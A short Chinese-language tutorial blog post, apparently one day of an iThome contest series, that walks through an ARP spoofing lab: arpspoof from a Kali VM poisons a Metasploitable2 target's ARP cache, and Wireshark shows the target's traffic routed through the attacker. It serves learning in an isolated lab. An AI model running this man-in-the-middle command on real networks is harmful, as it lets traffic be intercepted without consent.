iT邦幫忙

2025 iThome 鐵人賽

DAY 4
0

實作ARP Spoofing

#Metasploitable2靶機
arp -a #查看原始ARP緩存
#kali VM
ifconfig #查看MAC 08:00:27:12:27:59
sudo arpspoof -i eth0 -t 10.0.2.4 10.0.2.2 # "靶機IP" "要取代的IP"

攻擊前:
https://ithelp.ithome.com.tw/upload/images/20250918/20145527yG2wVSUPl8.png
攻擊後,10.0.2.2的MAC被改成kali VM的MAC:
https://ithelp.ithome.com.tw/upload/images/20250918/20145527BHDd2g466u.png

#Metasploitable2靶機
ping 10.0.2.2 #靶機傳封包給10.0.2.2

從WireShark可以觀察到靶機10.0.2.4傳給10.0.2.2的封包會經過kali VM再傳給10.0.2.2
https://ithelp.ithome.com.tw/upload/images/20250918/201455270uldrUI71r.png

就會變成這種情形,kali VM可以監聽靶機傳給10.0.2.2的封包內容
https://ithelp.ithome.com.tw/upload/images/20250918/20145527r6L5FTlCnA.png


上一篇
DAY 03
系列文
找工作期間不要讓自己太廢4
圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言